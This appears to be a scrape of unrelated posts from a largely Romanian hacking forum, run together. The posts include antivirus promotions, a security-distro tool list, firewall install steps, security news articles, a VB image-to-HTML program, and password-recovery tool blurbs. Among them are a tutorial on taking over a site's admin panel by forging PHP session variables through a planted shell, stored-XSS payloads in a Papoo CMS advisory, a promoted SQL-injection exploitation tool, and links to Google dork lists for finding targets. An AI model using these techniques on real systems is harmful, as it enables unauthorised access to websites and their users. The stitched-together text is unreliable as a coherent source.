Aerosol

Description Give your Android mobile devices TOTAL protection from viruses and privacy “intruders” with Bitdefender Mobile Security! PC Security Labs heralded this cutting-edge app with a FIVE STAR AWARD, so you know you can trust it to keep your device, your information, and your privacy safe! GIVE YOUR ANDROID THE PROTECTION IT DESERVES! Free Bitdefender Mobile Security & Antivirus (100% discount) | Daily giveaways and discounts | HungryForApps HungryForApps

Free Kaspersky Internet Security (100% discount) | Daily giveaways and discounts | HungryForApps HungryForApps Enter your email to download apps | Daily giveaways and discounts | HungryForApps HungryForApps Description Kaspersky Internet Security for Android delivers the latest mobile security technologies – including superior anti-theft protection and Android antivirus. All the great features of Kaspersky Mobile Security and Kaspersky Tablet Security are now available in a single easy-to-use solution that is optimized specifically for smartphones and tablets.

Priviti partea buna oameni isi fac reclama, acum stau si ma gandesc nu apare nimeni sa faca reclamatie? "I'm a barbie girl in a barbie world" )

Am gasit cateva liste - #1 Massive List of SQL Dorks - Pastebin.com - #2 Dork Google - Pastebin.com - #3 5000 Google Dork - Pastebin.com - #4 Google Dork's - Pastebin.com - #5 http://dl.packetstormsecurity.net/papers/general/ghdb.pdf - #6 http://pastebin.com/kdwrQEe9 - #7 http://pastebin.com/BAi6k5nV - #8 http://pastebin.com/Qw0nZdcZ - #9 http://pastebin.com/fiu5PEbD

Hello all, this is a little tutorial for takeover a website by using simple session variables at first we need a shell on the target with rights to excute php comands. and we need a target like a admin panel maybe you want to grab the pw & username but you failed because the hash is hashed in sha256 or something like that. so we need a other way to login in this time we can use they own login method if(!empty($_POST["pw"]) && !empty($_POST["us"])){ $row = mysql_fetch_object($res); if(md5($_POST["pw"])==$row->password && $_POST["us"]==$row->username){ $_SESSION["adminID"] = $row->adminID; $_SESSION["username"] = $row->username; $_SESSION["login"] = "1"; header("Location: users.php"); } }else{exit();} we see here a login with using sessions Note : Sessions are server-side variables. if we wont access to that admin panel we need just to do that : $_SESSION["adminID"] = "0"; $_SESSION["username"] = "admin"; $_SESSION["login"] = "1"; and we call the php file with that content and we can access the admin panel and we bypass the site authentication Credits to: T3N38R15

Am gasit un tool care transforma imaginile in HTMLCode, e scris in VB Download -> File-Upload.net - Picture-to-Html-code.exe Sourcecode : [VB.NET] VB.Net Image to a Graphical Html Code - Pastebin.com Public Class Form1 Dim file1 As String #Region "Controls : " Dim prog As New ProgressBar Dim pic As New PictureBox Dim WithEvents but1 As New Button Dim WithEvents but2 As New Button #End Region Public Sub Bitmap_To_Htmlcode(ByVal pic As Bitmap) Dim sw As New IO.StreamWriter(file1) sw.WriteLine("<style type=" & Chr(34) & "text/css" & Chr(34) & ">pa {font-size:5px;}" & Environment.NewLine & "</style><pa>") Dim bmp As New RoBitmap(pic) For y = 0 To bmp.Height - 1 Dim ste As String = "" For x = 0 To bmp.Width - 1 Dim col As Color = bmp.GetPixel(x, y) sw.Write("<font color=" & Chr(34) & "rgb(" & col.R.ToString & "," & col.G.ToString & "," & col.B.ToString & ")" & Chr(34) & ">@</font>") Next Me.Invoke(Sub() prog.Value += bmp.Width) sw.Write("</br>") Next sw.Write("</pa>") sw.Close() End Sub Public Sub lol() Dim bmp As Bitmap = CType(pic.Image, Bitmap) Me.Invoke(Sub() prog.Maximum = bmp.Width * bmp.Height) Bitmap_To_Htmlcode(bmp) MessageBox.Show("Finish") End Sub Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles but2.Click Dim fr As New SaveFileDialog fr.Filter = " HTML |*.html" fr.ShowDialog() file1 = fr.FileName Dim th As New Threading.Thread(AddressOf lol) th.Start() End Sub Private Sub but1_Click(sender As System.Object, e As System.EventArgs) Handles but1.Click Dim fr As New OpenFileDialog fr.Filter = "Image|*.jepg;*.jpg;*.bmp;*.png;*.gif" fr.ShowDialog() If IO.File.Exists(fr.FileName) = True Then pic.Image = New Bitmap(fr.FileName) End If End Sub Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load prog.Size = New Size(400, 21) prog.Location = New Point(12, 287) Me.Controls.Add(prog) pic.Size = New Size(483, 244) pic.Location = New Point(12, 37) Me.Controls.Add(pic) but1.Size = New Size(71, 19) but1.Location = New Point(12, 12) but1.Text = "load" Me.Controls.Add(but1) but2.Size = New Size(77, 21) but2.Location = New Point(418, 287) but2.Text = "save" Me.Controls.Add(but2) Me.Size = New Size(521, 352) Me.Text = "Picture to html" End Sub End Class Class RoBitmap Private bildDaten As Byte() Private colore As Color(,) Private m_width As Integer Private m_height As Integer Private Bild As Bitmap Private rect As Rectangle Private modified As Boolean Private bytes As Integer Private stride As Integer Private pixelFormat As System.Drawing.Imaging.PixelFormat Private colorPalette As System.Drawing.Imaging.ColorPalette Public Sub New(bld As Bitmap) Bild = bld SetzeWerte() End Sub Private Sub SetzeWerte() colorPalette = Bild.Palette pixelFormat = Bild.PixelFormat m_width = Bild.Width m_height = Bild.Height rect = New Rectangle(0, 0, m_width, m_height) Dim bmpData As System.Drawing.Imaging.BitmapData = Bild.LockBits(rect, System.Drawing.Imaging.ImageLockMode.[ReadOnly], Bild.PixelFormat) Dim ptr As IntPtr = bmpData.Scan0 stride = bmpData.Stride bytes = stride * m_height bildDaten = New Byte(bytes - 1) {} System.Runtime.InteropServices.Marshal.Copy(ptr, bildDaten, 0, bytes) Bild.UnlockBits(bmpData) colore = New Color(m_width - 1, m_height - 1) {} Select Case pixelFormat Case System.Drawing.Imaging.PixelFormat.Format32bppArgb Format32BppArgb() Exit Select Case System.Drawing.Imaging.PixelFormat.Format24bppRgb Format24BppRgb() Exit Select Case System.Drawing.Imaging.PixelFormat.Format8bppIndexed Format8BppIndexed() Exit Select Case System.Drawing.Imaging.PixelFormat.Format4bppIndexed Format4BppIndexed() Exit Select Case System.Drawing.Imaging.PixelFormat.Format1bppIndexed Format1BppIndexed() Exit Select End Select modified = False End Sub Private Sub Format32BppArgb() For y As Integer = 0 To m_height - 1 For x As Integer = 0 To m_width - 1 colore(x, y) = Color.FromArgb(bildDaten(y * stride + x * 4 + 3), bildDaten(y * stride + x * 4 + 2), bildDaten(y * stride + x * 4 + 1), bildDaten(y * stride + x * 4)) Next Next End Sub Private Sub Format24BppRgb() For y As Integer = 0 To m_height - 1 For x As Integer = 0 To m_width - 1 colore(x, y) = Color.FromArgb(bildDaten(y * stride + x * 3 + 2), bildDaten(y * stride + x * 3 + 1), bildDaten(y * stride + x * 3)) Next Next End Sub Private Sub Format8BppIndexed() For y As Integer = 0 To m_height - 1 For x As Integer = 0 To m_width - 1 colore(x, y) = colorPalette.Entries(bildDaten(y * stride + x)) Next Next End Sub Private Sub Format4BppIndexed() For y As Integer = 0 To m_height - 1 For x As Integer = 0 To m_width - 1 If x Mod 2 = 0 Then colore(x, y) = colorPalette.Entries(LowByte(bildDaten(y * stride + x \ 2))) Else colore(x, y) = colorPalette.Entries(HighByte(bildDaten(y * stride + x \ 2))) End If Next Next End Sub Private Sub Format1BppIndexed() Dim rest As Integer = m_width Mod 8 Dim bits As Byte Dim x As Integer, y As Integer For y = 0 To m_height - 1 For x = 0 To m_width - 9 Step 8 bits = bildDaten(y * stride + x \ 8) colore(x, y) = colorPalette.Entries((bits And 128) \ 128) colore(x + 1, y) = colorPalette.Entries((bits And 64) \ 64) colore(x + 2, y) = colorPalette.Entries((bits And 32) \ 32) colore(x + 3, y) = colorPalette.Entries((bits And 16) \ 16) colore(x + 4, y) = colorPalette.Entries((bits And 8) \ 8) colore(x + 5, y) = colorPalette.Entries((bits And 4) \ 4) colore(x + 6, y) = colorPalette.Entries((bits And 2) \ 2) colore(x + 7, y) = colorPalette.Entries(bits And 1) Next bits = bildDaten(y * stride + x \ 8) Dim teiler As Integer = 128 For i As Integer = 0 To rest - 1 colore(x + i, y) = colorPalette.Entries((bits And teiler) \ teiler) teiler = CInt(teiler / 2) Next Next End Sub Private Function HighByte(zahl As Byte) As Integer Return zahl >> 4 End Function Private Function LowByte(zahl As Byte) As Integer Return zahl And 15 End Function Public Function GetPixel(x As Integer, y As Integer) As Color Return colore(x, y) End Function Public Sub SetPixel(x As Integer, y As Integer, col As Color) colore(x, y) = col modified = True End Sub Public ReadOnly Property Width() As Integer Get Return m_width End Get End Property Public ReadOnly Property Height() As Integer Get Return m_height End Get End Property Public Property Image() As Bitmap Get If Not modified Then Return Bild End If Select Case pixelFormat Case System.Drawing.Imaging.PixelFormat.Format32bppArgb Return ReturnFormat32BppArgb() Case System.Drawing.Imaging.PixelFormat.Format24bppRgb Return ReturnFormat24BppRgb() Case System.Drawing.Imaging.PixelFormat.Format8bppIndexed 'ReturnFormat8BppIndexed(); Exit Select Case System.Drawing.Imaging.PixelFormat.Format4bppIndexed 'ReturnFormat4BppIndexed(); Exit Select Case System.Drawing.Imaging.PixelFormat.Format1bppIndexed 'ReturnFormat1BppIndexed(); Exit Select End Select Return Nothing End Get Set(value As Bitmap) Bild = value SetzeWerte() End Set End Property Private Function ReturnFormat24BppRgb() As Bitmap For y As Integer = 0 To m_height - 1 For x As Integer = 0 To m_width - 1 bildDaten(y * stride + x * 3 + 2) = colore(x, y).R bildDaten(y * stride + x * 3 + 1) = colore(x, y).G bildDaten(y * stride + x * 3) = colore(x, y).B Next Next Dim bmpData As System.Drawing.Imaging.BitmapData = Bild.LockBits(rect, System.Drawing.Imaging.ImageLockMode.[WriteOnly], Bild.PixelFormat) Dim ptr As IntPtr = bmpData.Scan0 System.Runtime.InteropServices.Marshal.Copy(bildDaten, 0, ptr, bytes) Bild.UnlockBits(bmpData) modified = False Return Bild End Function Private Function ReturnFormat32BppArgb() As Bitmap For y As Integer = 0 To m_height - 1 For x As Integer = 0 To m_width - 1 bildDaten(y * stride + x * 4 + 3) = colore(x, y).A bildDaten(y * stride + x * 4 + 2) = colore(x, y).R bildDaten(y * stride + x * 4 + 1) = colore(x, y).G bildDaten(y * stride + x * 4) = colore(x, y).B Next Next Dim bmpData As System.Drawing.Imaging.BitmapData = Bild.LockBits(rect, System.Drawing.Imaging.ImageLockMode.[WriteOnly], Bild.PixelFormat) Dim ptr As IntPtr = bmpData.Scan0 System.Runtime.InteropServices.Marshal.Copy(bildDaten, 0, ptr, bytes) Bild.UnlockBits(bmpData) modified = False Return Bild End Function End Class

@fusername in loc sa faci offtopic imi puteai da pm frate nu a aparut la search...

Use in a VM or Sandbox. Steganosia allow to hide any type of files in picture. and for sure you can also extract the hided content from a previous binding with same software. Binding and extract algorythm use the common LSB method for bind and extract contents. Settings: Bind: Extract: Credits: Features : Bind content into picture. Extract content from binded picture. Extract can be protected by password(Header Encryption must be enabled for set password). Secure picture/file delete. Binding color canal selection. AES Header Encryption for protect binding algorithm settings and extract password. Beta version : 0.7.3.0 Download Virus Scan

This is an automatic SQL Injection tool called as FatCat, Use of FatCat for testing your web application and exploit your application more deeper. FatCat Features that help you to extract the Database information, Table information, and Column information from web application. Only If it is vulnerable to Mysql SQL Injection Vulnerability. The user friendly GUI of FatCat and automatically detect the sql vulnerability and start exploiting vulnerability. Features 1)Normal SQL Injection 2) Double Query SQL Injection Requirement 1) PHP Verison 5.3.0 2) Enable file_get_function Download : Link

The Matriux is a phenomenon that was waiting to happen. It is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system. With Matriux, you can turn any system into a powerful penetration testing toolkit, without having to install any software into your hardisk. Matriux is designed to run from a Live environment like a CD / DVD or USB stick or it can easily be installed to your hard disk in a few steps. Matriux also includes a set of computer forensics and data recovery tools that can be used for forensic analysis and investigations and data retrieval. The Matriux Arsenal contains a huge collection of the most powerful and versatile security and penetration testing tools. The Matriux Arsenal includes the following tool / utilities / libraries (The ßeta release will contain only few of the listed tools): Arsenal List: - Reconnaissance - DNS chaosmap DIG DNSTracer DNSWalk rebind - HTTrack HTTrack WebHTTrack Website Copier Browse Mirrored Websites Chaosreader Deepmagic Information Gathering Tool dradis framework dsniff password sniffer EtherApe EtherApe (root) fragroute peepdf quickrecon tcpdump tcpslice tcptrace tcptraceroute vidalia Network Analyzer (Wireshark) xtrace - Scanning - Cisco CDP Packet Generator CDP Global Exploiter HSRP Generator - BATMAN-Tools batping batroute batdump - Routing-Protocols Autonomous System Scanner IGRP Route Injector - Web-Scanners blindelephant dirbuster JHijack Nikto RIPS Scanner theHarvester scrapy urlcrazy wafp whatweb xxser XSSploit (CLI) XSSploit (GUI) Angry IP Scan CryptCat ettercap console Ettercap Gui file2cable Web Server Fingerprinting Tool gggooglescan metagoofil icmpush icmpquery IRDP Packet Sender IRDP Responder Packet Sender Netcat netenum netmask Nmap Nmap Si4 Full mode Nmap Si4 user mode Nmap Si4 Logr ostinato sinfp snacktime Paris Traceroute Pastenum Protocol Scanner Parallel Internet Measurement Utility tctrace THC-Amap The Network Mapper Front End - Gain Access (Attack Tools) - Brute-Force apligen BruteSSH Cacheebr Embedr Entibr iisbruteforcer John the ripper iisbruteforcer rarcrack - Password bbox-keygen cmospwd crunch etemenanki md5pack md5unpack md5-utils medusa sucrack THC-Hydra Console THC-Hydra GUI vncrack vncpwddump - SQL bsqlbf minimysqlat0r pblind sqlibf sqlinjtools sqlmap SQLninja sqlid sqlsus - THC-IPv6 alive6 denial6 detectnewip6 dnsdict6 dos-new-ip6 exploit6 fakemipv6 fake_mld26 fake_mld6 fake_mldrouter6 fake_router6 fakeadvertise6 fuzzip6 implementation6 implementation6d parasite6 redir6 rsmumrf6 sendpees6 smurf6 thcping6 toobig6 trace6 Mac Changer sipcrack socat - Framework - Inguma Inguma-cli Inguma-gui - Metasploit Framework armitage msfcli msfconsole msfgui - SET SET Console Mode SET web mode - smartphone pentest framework spfconsole spf gui - w3af w3af console w3af gui BeEF Grendel-Scan HTTP Request Exploit Framework isr-evilgrade Mantra Framework shell storm framework skipfish subterfuge webscarab WebSecurify WSFuzzer yersinia - Radio - Bluetooth bluedivingNG bluemaho bluescan bss carwhisperer haraldscan pwntooth - voip sipvicious authtool enuimiax iaxscan scapy SIP Proxy voiper airbase-ng aircrack-ng airdecap-ng airdecloak-ng airdriver-ng aireplay-ng airmon-ng airodump-ng airolib-ng airoscript-ng airserv-ng airtun-ng buddy-ng chapcrack-ng cowpatty gerix wificracker grimwepa kismet easside-ng packetforge-ng pyrit reaverwps tkiptun-ng wepbuster wesside-ng whichdriver wicd WiFi Radar wifite - Digital-Forensics - Acquisition Automated Image & Restore 1.28 galleta voolatilitux volatility Guymager - Analysis bokken & pyew Androguard apk inspector Start Autopsy Autopsy Forensics Browser foremost forensic data identifier Gpart iphone analyzer Jbrofuzz mmsdec scalpel Pasco steghide Vinetto Start WarVOX Open WarVOX Web Interface Xplico Console Mode (Internet Traffic Decoder) Xplico Web Interface (Internet Traffic Decoder) - Digital Forensic Framework DFF console DFF GUI - metaextractors antiword catdoc exifcom exifgrep exiflibtool exifprobe exiftags exiftime exiftool exiv2 flare flasm jhead pdffonts pdfimages pdfinfo pdftops pdftotext pngchunks pngcp pngcrush pnginfo dcfldd Draugr Extensive File Dumper Mobius Forensic Toolkit pyflag testdisk warrick Dhash - Debugger boomerang Crash dissy e2dbg hexedit efence JavaScript Lint netifera valgrind - Tracer - Leak-Tracer Leak Analyze Leak Check etrace latrace ltrace pstack strace - Misc - Fuzzers JbroFuzzer zzuf - sipvicious svcrack svcrash svlearnfp svmap svreport svwar burpsuite geoipgen packetpig PE file analysis toolkit pytbull ROP gadget Scamper sslstrip stegoshare truecrypt Download SourceForge

Parrot OS 1.6 Download

1 SSH into your server with the root user 2 If you are in a directory already, use cd to go back to your home directory. In the root users case, it'll be /root 3 Use the command wget http://configserver.com/free/csf.tgz 4 Type tar -zxvf csf.tgz 5 Type cd csf 6 Type ./install.sh You now have CSF installed. It would take me far too long to go through all of its features. It's basically a front end to iptables. Pretty straight forward to edit Notable features would probably be -Blocking incoming ping -Blocking countries -Sending emails when someone who is not in the ignore list logs into ssh (Ignore list is /etc/csf/csf.ignore) There are tons of features For maximum security, only allow incoming/outgoing ports that you need.

#1 - Malwarebytes Anti-Exploit Malwarebytes Anti-Exploit is a security program that protects you from zero-day exploits that target browser and application vulnerabilities. This program is meant to run alongside your traditional anti-virus or anti-malware products and provides extra protection against software and Windows vulnerabilities that are discovered, but do not have a patch available to fix them. Download - Malwarebytes Anti-Exploit Download #2 - Malwarebytes Anti-RootKit Malwarebytes Anti-Rootkit is a free program that can be used to search for and remove rootkits from your computer.* When started, Malwarebytes Anti-Rootkit will scan your computer and allow you to remove any rootkits that it finds. Download - Malwarebytes Anti-Rootkit Download #3 - (JRT) Junkware Removal Tool Junkware Removal Tool is a security utility that searches for and removes common adware, toolbars, and potentially unwanted programs (PUPs) from your computer.* A common tactics among freeware publishers is to offer their products for free, but bundle them with PUPs in order to earn revenue.* This tool will help you remove these types of programs. Download - Junkware Removal Tool Download #4 - AdwCleaner AdwCleaner is a program that searches for and deletes Adware, Toolbars, Potentially Unwanted Programs (PUP), and browser Hijackers from your computer.* By using AdwCleaner you can easily remove many of these types of programs for a better user experience on your computer and while browsing the web. Download - AdwCleaner Download #5 - SUPERAntiSpyware SUPERAntiSpyware is a free anti-spyware program that offers excellent detections and quick removal of common infections. As malware is constantly evolving and new variants are released, there is not one particular security program that will be able to protect you from all threats.* Therefore it is important to have a variety of programs in your security toolbox that you can use to scan your computer for malware and aid you in their removal.* SUPERAntiSpyware is definitely one of the programs that you want to have at your disposal. Download - SUPERAntiSpyware Download #6 - CCleaner CCleaner is a program that will scan your computer for temporary files or private browser and deletes it from your computer.* This allows you to keep your computer running efficiently, while protecting your sensitive information. Download - CCleaner Download #7 - Revo Uninstaller Revo Uninstaller allows you to uninstall stubborn programs that are not uninstalling properly through the Windows control panel. Download - Revo Uninstaller Download #8 GMER Rootkit Detector and Remover GMER - Rootkit Detector and Remover #9 RogueKiller ,a good program http://download.cnet.com/RogueKiller...-75764640.html Credit's to: syst3m

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users. Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it. The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security. Download Cain & Abel v2.0 for Windows 9x (discontinued and not supported anymore)MD5 - A14185FAFC1A0A433752A75C0B8CE15D SHA1 - 8F310D3BECC4D18803AF31575E8035B44FE37418 Download Cain & Abel v4.9.56 for Windows NT/2000/XP MD5 - EA2EF30C99ECECB1EDA9AA128631FF31 SHA1 - 82407EAF6437D6956F63E85B28C0EC6CA58D298A Cain & Abel User Manual is included in the installation package and also available on-line so you can view all the program's features without the need to install the program. The on-line version of the manual requires a JavaScript enabled browser. View Cain & Abel on-line User Manual

This is a thread containing the best open source FDE and File Encryption programs [*]Truecrypt http://www.truecrypt.org/ Compatibility: Windows, Linux, OSX (note full disk encryption is only available on Windows) [*]DiskCryptor https://diskcryptor.net/wiki/Main_Page Compatibility: Windows [*]cryptsetup (LUKS) https://code.google.com/p/cryptsetup/ Compatibility: Linux Credit's to: Pack3ts

The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system. Changes: Changed to emit standard D-Bus signal when D-Bus properties change. Download

@c0saru in primul rand ai postat in categoria gresita ( si ai facut asta intentionat fiindca nu ai 10 posturi pentru categoria Cereri) am uitat sa mentionez ca acele 10 posturi trebuie sa fie de calitate nu offtopic. in al doilea rand nu mai veni cu astfel de cereri aici fiindca nimeni nu o sa iti dea.

Salut, gasiti aici: Free Windows Security Tools from www.SecurityXploded.com o serie de 138 tool-uri Password Recovery Tools Anti-Spyware/Anti-Rootkit Tools Network Security Tools System Security Tools

The Chromium security team is devising a plan to explicitly and actively inform users that ‘HTTP’ connections provide no data security protections. Google’s grand vision is that some day, HTTPS will become so widespread and commonplace that secure connections can be unmarked in the way that HTTP connections are currently. In a post on the Chromium Projects website, the Chrome Security Team proposed that user agents (UAs) gradually change their user interfaces and experiences in order that they display non-secure origins as “affirmatively non-secure.” The change will likely result in new address bar indicators for the various browsers. The warning will be similar to existing HTTPS signifiers, effectively communicating the opposite message, namely that the user’s connection to a website, mail service or other software agent is not secure. Ivan Ristic, the author of SSL Labs and Bulletproof SSL and TLS, told Threatpost in an email interview that Google’s decision here is a step in the right direction. The current situation in which the default is that web sites are not encrypted and some sites opt-in to security is not secure and never can be This change itself, he said, is not going to make us significantly more secure. However, he continued, it’s an important step in the overall transition to a secure Internet. Google suggests that UA connections are classified into three states of transport layer security. Secure (having a valid HTTPS certificate); dubious (valid HTTPS but with mixed passive resources or a valid HTTPS with minor TLS errors); and non-secure (either broken HTTPS or just HTTP). Google is encouraging vendors to take a phased approach to implementing these changes. For example, they say it may be a good idea to treat dubious and non-secure origins similarly in the medium-term before classifying HTTP connections in the same way they classify sites with known bad origins in the long-term. Source

A worm exploiting network attached storage devices vulnerable to the Bash flaw is scanning the Internet for more victims. The worm opens a backdoor on QNAP devices, but to date it appears the attackers are using the exploit to run a click-fraud scam, in addition to maintaining persistence on owned boxes. QNAP of Taiwan released a patch in October for the Bash vulnerability in its Turbo NAS products. Like many other vulnerable products and devices, owners may not be aware that Bash is present and exposed. Bash was among a litany of Internet-wide vulnerabilities uncovered this year; the flaw in Bash, or Bourne Again Shell, affects Linux and UNIX distributions primarily, but also Windows in some cases. Bash is accessed, often quietly, by any number of functions which makes comprehensive patching difficult even though all major Linux distributions and most vendors have issued patches. Ullrich said the risks are significant to organizations running QNAP, which are used as shared drives or for backups or virtual machines. With Bash quietly invoked in functions, organizations may not be aware of the availability of a patch. With Bash quietly invoked in functions, organizations may not be aware of the availability of a patch. The worm in question targets a QNAP CGI script /cgi-bin/authLogin.cgi, which has been targeted by Shellshock exploits in the past, a SANS Institute advisory said. The script can be accessed without authentication and the attackers in this case then launch a shell script capable of downloading additional malware. SANS published two hashes used in the attack, which uses a click-fraud script against the JuiceADV advertising network, which then uploads to ppoolloo[.]altervista[.]com. The script also creates a hidden directory where it stores downloaded scripts and files. Once on a compromised machine, it sets the DNS server to 8.8.8.8 and creates an SSH server on port 26. For additional persistence and exclusivity to compromised machines, the script also downloads and installs the Shellshock patch from QNAP. Source

NSA operations center Image: NSA Verizon is dipping its feet into the "post-Snowden" world with a voice-encryption app: one that opens up constitutionally protected Americans for eavesdropping by U.S. law enforcement and intelligence agencies. Dubbed Verizon Voice Cypher, the free-to-download app for iPhones, Android devices, and BlackBerrys offers businesses and government users end-to-end call encryption, regardless of the carrier. The app works by scrambling voice calls using Cellcrypt's technology. But the U.S. government is still able to tap into the calls, according to Bloomberg Businessweek, which first wrote about the service last week. "It's only creating a weakness for government agencies," Cellcrypt's Seth Polansky told the magazine, disputing the idea that the backdoor creates a security risk. "Just because a government access option exists, it doesn't mean other companies can access it." There's nothing wrong with that statement -- at least on a factual basis. But, morally it's repugnant to promote a service that opens up potentially anybody who uses it, Americans and all, to greater and more direct surveillance. Here's why. In the wake of the National Security Agency (NSA) surveillance leaks, many more people are encrypting their web traffic. It's a smart move alone for the security conscious. Since data thefts and breaches have become a near daily occurrence -- at least for a while it felt like that -- encrypting data makes it harder for hackers to do anything with it. But the rules of engagement under which the NSA can collect domestic Americans data, the so-called "minimization procedures" also leaked by Snowden, showed that the NSA can retain encrypted data -- even on Americans -- for up to five years. Just using Verizon's app will make you stand out like a Christmas tree on the NSA's radar. Making matter worse, the U.S. government in cahoots with its British counterparts have, according to more leaked documents, successfully broken or circumvented many online encryption standards. Even when encryption is there, it's collectable under secret policies, and crackable. But the NSA has a backdoor already. Even though it doesn't need one, the law doesn't always require one, either. Under existing U.S. law, Verizon has to allow its networks to be wiretapped if a warrant is presented. But, that's only if the means are there to do it. In some cases, encryption is set up in such a way that even the company cannot hand over anything meaningful to law enforcement. Many companies bolstered or altered their systems post-Snowden so that even they couldn't access the data. Apple cannot hand over data it doesn't have the encryption keys to. (That's probably why, at least in part, Apple iPhones have become so popular in the enterprise.) In recent months, Apple and Google stepped up their customers' device security by taking themselves out of the data demand equation altogether. FBI director James Comey said Apple was allowing its customers to "place themselves beyond the law." While many companies doubled-down on security, encryption, and privacy protection in the wake of the Snowden leaks, Verizon actively included a backdoor in its calling app. Why remains unclear. There is no doubt that enterprise customers -- including government users -- want more effective and simple ways to secure their communications: emails, chats, calls -- just to name a few. But the government has been shown to engage in industrial espionage, which it says it "does not." Though the U.S. Director of National Intelligence James Clapper denied it was industrial espionage, he did say it's "not a secret" that the intelligence community "collects information about economic and financial matters, and terrorist financing," for example to predict financial crises. Backdoors don't necessarily make products weaker. They do however make your communications less private. Verizon's ill thought-out and half-baked attempt to create something marketed as something you should "trust" may be to some a marketing ploy. To others, it's downright irresponsible. For a few, it's dangerous. Why Verizon wants to expand in this space is unclear. But while other, more secure services exist that don't contain backdoors -- we know because the code is public and can be inspected -- there's no room for Verizon to compete. Source

Advisory: Persistent XSS Vulnerability in CMS Papoo Light v6 Advisory ID: SROEADV-2014-01 Author: Steffen Rösemann Affected Software: CMS Papoo Version 6.0.0 Rev. 4701 Vendor URL: http://www.papoo.de/ Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description: ========================== The CMS Papoo Light Version has a persistent XSS vulnerability in its guestbook functionality and in its user-registration functionality. ================== Technical Details: ================== XSS-Vulnerability #1: Papoo Light CMS v6 provides the functionality to post comments on a guestbook via the following url: http://{target-url}/guestbook.php?menuid=6. The input fields with the id „author“ is vulnerable to XSS which gets stored in the database and makes that vulnerability persistent. Payload-Examples: <img src='n' onerror=“javascript:alert('XSS')“ > <iframe src=“some_remote_source“></iframe> XSS-Vulnerability #2: People can register themselves on Papoo Light v6 CMS at http://{target-url}/account.php?menuid=2. Instead of using a proper username, an attacker can inject HTML and/or JavaScriptcode on the username input-field. Code gets written to the database backend then. Attacker only has to confirm his/her e-mail address to be able to login and spread the code by posting to the forum or the guestbook where the username is displayed. Payload-Examples: see above (XSS #1) ========= Solution: ========= Update to the latest version ==================== Disclosure Timeline: ==================== 13-Dec-2014 – found XSS #1 13-Dec-2014 - informed the developers (XSS #1) 14-Dec-2014 – found XSS #2 14-Dec-2014 – informed the developers (XSS #2) 15-Dec-2014 - release date of this security advisory 15-Dec-2014 - response and fix by vendor 15-Dec-2014 - post on BugTraq ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== http://www.papoo.de/ http://sroesemann.blogspot.de Source

Wordpress Download Manager (download-manager) Unauthenticated File Upload WordPress iTwitter WP 0.04 CSRF / XSS WordPress twitterDash 2.1 CSRF / XSS WordPress DandyID Services ID 1.5.9 CSRF / XSS WordPress SPNbabble 1.4.1 CSRF / XSS WordPress Download Manager 2.7.4 Remote Command Execution WordPress wpCommentTwit 0.5 CSRF / XSS WordPress yURL ReTwitt WP 1.4 CSRF / XSS Mikiurl WordPress Eklentisi 2.0 CSRF / XSS WordPress O2Tweet 0.0.4 CSRF / XSS

Network Password Decryptor is the free tool to instantly recover network authentication passwords stored on your system. In addition to the network authentication passwords it can also recover passwords stored by other windows apps such as Outlook, Windows Live Messenger, Remote Destktop etc. These network passwords are stored in encrypted format and even administrator cannot view these passwords. Also some type of passwords cannot be decrypted even by administrators as they require special privileges. Network Password Decryptor automatically detect and decrypt all these stored network passwords. With Version v5.0 onwards, it supports network password recovery on all 64-bit platforms including Windows 8. For command-line version check out Network Password Dump tool. Note: Network Password Decryptor is not hacking or cracking tool as it can only help you to recover your own lost Network passwords that is previously stored in your system. It works on both 32-bit & 64-bit platforms starting from Windows XP to latest operating system, Windows 8. Features All network authentication passwords stored by Windows. Supports both 32-bit & 64-bit platforms Basic/Digest authentication passwords stored by Internet Explorer Google login password stored by GMail Notifier Remote Desktop stored passwords. Exchange server login passwords stored by Outlook. Login passwords of Windows Live Messenger NetworkPasswordDecryptor also allows you to delete any of the stored passwords from 'Credential Store'. This is useful if the password has changed or if the user has accidently saved the critical password. Also it provides option to save the decrypted network password list to HTML/XML/Text/CSV format. Download

